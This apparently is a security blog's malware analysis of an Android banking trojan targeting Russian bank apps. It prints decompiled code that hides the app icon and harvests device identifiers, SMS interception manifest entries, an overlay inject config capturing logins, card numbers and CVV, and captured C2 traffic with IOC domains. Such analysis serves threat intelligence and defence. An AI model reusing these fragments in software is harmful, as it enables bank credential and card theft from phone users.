Monday, 25 September 2017

Mobile Threats targeting Russian Banks

Targets (banks): 
ru.sberbankmobile (Sberbank of Russia / Сбербанк Онлайн), ru.alfabank.mobile.android (Alfa Bank / Альфа-Банк), ru.vtb24.mobilebanking.android (VTB24 / ВТБ24-Онлайн)


Target Language & Locales (based on Values):
Russian, English and Polish 

SHA-256 (Koodous / VT): 
D118B6A3A86F6BCB303756F3154BFEBDCEBA30C82E8443254F61F29E2FEC5715


preferences.xml
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
<?xml version='1.0' encoding='utf-8' standalone='yes' ?><map>
    <string name="number">1555xxxxx0</string>
    <string name="App Restrictions">AAAAAA==
    </string>
    <string name="timetask">17/10/17 10:24:31</string>
    <string name="sentsms">11506,</string>
    <string name="injects">ru.sberbankmobile;ru.alfabank.mobile.android;ru.vtb24.mobilebanking.android;ru.sberbankmobile</string>
    <string name="str">xxxxxxxxxx</string>
    <string name="operator">MTS</string>
    <string name="country">ru</string>
    <string name="botpwd">xxxxxxxxxxx</string>
    <string name="imei">xxxxxxxx</string>
    <string name="mode">xxxxxxxxxxxxxx</string>
    <string name="intercept">900;Beeline;111;7878;+900;Beeline;111;7878;+79254247494;7494;QIWIWallet;beeline;6996;8464;117007227;My Beeline;MTC;iMTCPay;8900;117007228;AntivirusMF;mts-FMS</string>
    <int name="haveinj" value="0" />
    <int name="autonet" value="1" />
</map>

settings.xml (from assets)
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
<?xml version="1.0" encoding="UTF-8"?><!-- Файл должен быть в кодировке UTF-8 (без BOM) -->
<document>
 <name>Сбербанк</name><!-- Название инжекта -->
 <apps>ru.sberbankmobile;com.mobilecard.sberbank</apps><!-- Приложения, которые будут перекрываться (через точку с запятой) -->
 <size>1</size><!-- Размер инжекта (1 - стандартный, 2 - в виде диалога) -->
 <storage>2</storage><!-- Место хранения инжекта (1 - в устройстве, 2 - на сервере) -->
 
 <step><!-- Новый шаг (форма) -->
  <param><!-- Параметр в шаге (форме) -->
   <column>Пароль2</column><!-- Название колонки (для вкладки "Инжекты"->"Данные") -->
   <name>password</name><!-- Название параметра (поле name в форме в файле index.html) -->
  </param>

  <param>
   <column>Логин2</column>
   <name>login</name>
  </param>

  <param>
   <column>Пароль</column>
   <name>password</name>
  </param>

  <param>
   <column>Логин</column>
   <name>login</name>
  </param>
 </step>

 <step>
  <param>
   <column>ГГ2</column>
   <name>expiry_year</name>
  </param>

  <param>
   <column>ММ2</column>
   <name>expiry_month</name>
  </param>

  <param>
   <column>Карта2</column>
   <name>card_number</name>
  </param>

  <param>
   <column>ГГ</column>
   <name>expiry_year</name>
  </param>

  <param>
   <column>Карта</column>
   <name>card_number</name>
  </param>

  <param>
   <column>ММ</column>
   <name>expiry_month</name>
  </param>
 </step>

 <step>
  <param>
   <column>Cvv</column>
   <name>cvv</name>
  </param>

  <param>
   <column>Cvv2</column>
   <name>cvv</name>
  </param>
 </step>

</document>

Retrieves device information like network operator name, phone number, device id and the ISO country code. In addition it hides the application icon. The code below can be found in the decrypted payload.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
v6.putString(nzkic.Q(v0_1, v1, v1 & 21), ((TelephonyManager)v4).getNetworkOperatorName());
        v6.putString(nzkic.Q(nzkic.W[7], nzkic.W[7] - 3, nzkic.W[7]), ((TelephonyManager)v4).getLine1Number());
        v6.putString(nzkic.Q(nzkic.W[4] + 1, 21, nzkic.W[19]), ((TelephonyManager)v4).getDeviceId());
        v6.putString(nzkic.Q(nzkic.E, -nzkic.W[15], nzkic.W[26]), ((TelephonyManager)v4).getSimCountryIso()
                .toString());
        v6.apply();
        try {
            if(!e.Q(ewpgkdp.class, nzkic.Q)) {
                Intent v7 = new Intent(nzkic.Q, ewpgkdp.class);
                v7.setFlags(268435456);
                nzkic.Q.startService(v7);
            }

            goto label_69;
        }
        catch(Exception ) {
        label_69:
            this.setContentView(2130903040);
            this.findViewById(2131296263).setOnClickListener(new ap(this));
            try {
                nzkic.Q.getPackageManager().setComponentEnabledSetting(new ComponentName(nzkic.Q, nzkic
                        .class), 2, 1);
                return;
            }
            catch(Exception ) {
                return;
            }
        }

Code in Manifest to listen for incoming MMS messages and allow the trojan to send new MMS/SMS messages.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
  <activity android:name="com.vuzbswbpv.ipapszyud.pmeoacpq" android:theme="@android:style/Theme.Translucent.NoTitleBar">
            <intent-filter>
                <action android:name="android.intent.action.SEND" />
                <action android:name="android.intent.action.SENDTO" />
                <category android:name="android.intent.category.DEFAULT" />
                <category android:name="android.intent.category.BROWSABLE" />
                <data android:scheme="sms" />
                <data android:scheme="smsto" />
                <data android:scheme="mms" />
                <data android:scheme="mmsto" />
            </intent-filter>
        </activity>
        <activity android:label="watkzhcehx" android:name="com.vxnpedkz.fxdjrjoap.miakcfgde" />
        <receiver android:enabled="@bool/KitKat" android:name="com.vuzbswbpv.ipapszyud.skuogio" android:permission="android.permission.BROADCAST_WAP_PUSH">
            <intent-filter>
                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER" />
                <data android:mimeType="application/vnd.wap.mms-message" />
            </intent-filter>
        </receiver>

Use a TYPE_SYSTEM_ERROR (2010) dialog to display a dialog above any kind of activity.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
   WindowManager$LayoutParams v5 = new WindowManager$LayoutParams();
        v5.flags = 7078272;
        v5.format = -3;
        this.W = this.findViewById(2131296264);
        ViewParent v6 = this.W.getParent();
        if(v6 != null) {
            ((ViewGroup)v6).removeView(this.W);
        }

        v5.format = 1;
        v5.type = 2010;
        v5.gravity = 51;
        int v0 = v6 != null ? -1 : this.W.getLayoutParams().width;
        v5.width = v0;
        v0 = v6 != null ? -1 : this.W.getLayoutParams().height;
        v5.height = v0;
        this.getApplicationContext().getSystemService(qoquqms.Q(-qoquqms.F[9], qoquqms.F[0], qoquqms
                .F[0] | 109).intern()).addView(this.W, ((ViewGroup$LayoutParams)v5));
        this.W.findViewById(2131296272).setOnClickListener(new j(this, this.W.findViewById(2131296265), 
                this.W.findViewById(2131296273)));

Traffic:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
REQUEST xx.x.x.xx:xxxxx -> wef34r34rs.xyz:80 at 1506759408511
================================================================================
POST /req.php HTTP/1.1
Host: wef34r34rs.xyz
Connection: Keep-Alive
Content-Length: 18
Content-Type: application/x-www-form-urlencoded
User-Agent: yasuo23

mode=showInj
name=

RESPONSE wef34r34rs.xyz:80 -> xx.x.x.xx:xxxxx 
================================================================================
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 110
Content-Type: application/json; charset=utf-8
Date: Mon, 25 Sep 2017 08:16:50 GMT
Server: nginx/1.10.2
X-Powered-By: PHP/5.4.16

{"info": [{"key": 493xxxx27, "mode": "dRTfO8nxGlQokDcccccccccccccc6f2"}], "response": [], "status": "ok"}

REQUEST xx.x.x.xx:xxxxx -> wef34r34rs.xyz:80
================================================================================
POST /req.php HTTP/1.1
Host: wef34r34rs.xyz
Connection: Keep-Alive
Content-Length: 206
Content-Type: application/x-www-form-urlencoded
User-Agent: yasuo23

imei=490xxxxxxx8
inj=
mode=voice
number=1xxxxxxxx0
operator=MTS
rights=0
sdk=23
country=ru
hooksms=
prefix=635
version_bot=23
pwd=3c1fxxxxxxxxxxxxxxxxxxxxx1ed14
hookcalls=
version_sdk=Nexus 4 v.6.0.1

IOCs

Urls
154.16.244.28 23r23e23er.xyz
154.16.244.28 fwefr434r3.xyz
154.16.244.140 ge5t5t54trtr.xyz
154.16.244.28 rgrer43e2e.xyz
154.16.244.28 wef34r34rs.xyz

Images

No comments:

Post a Comment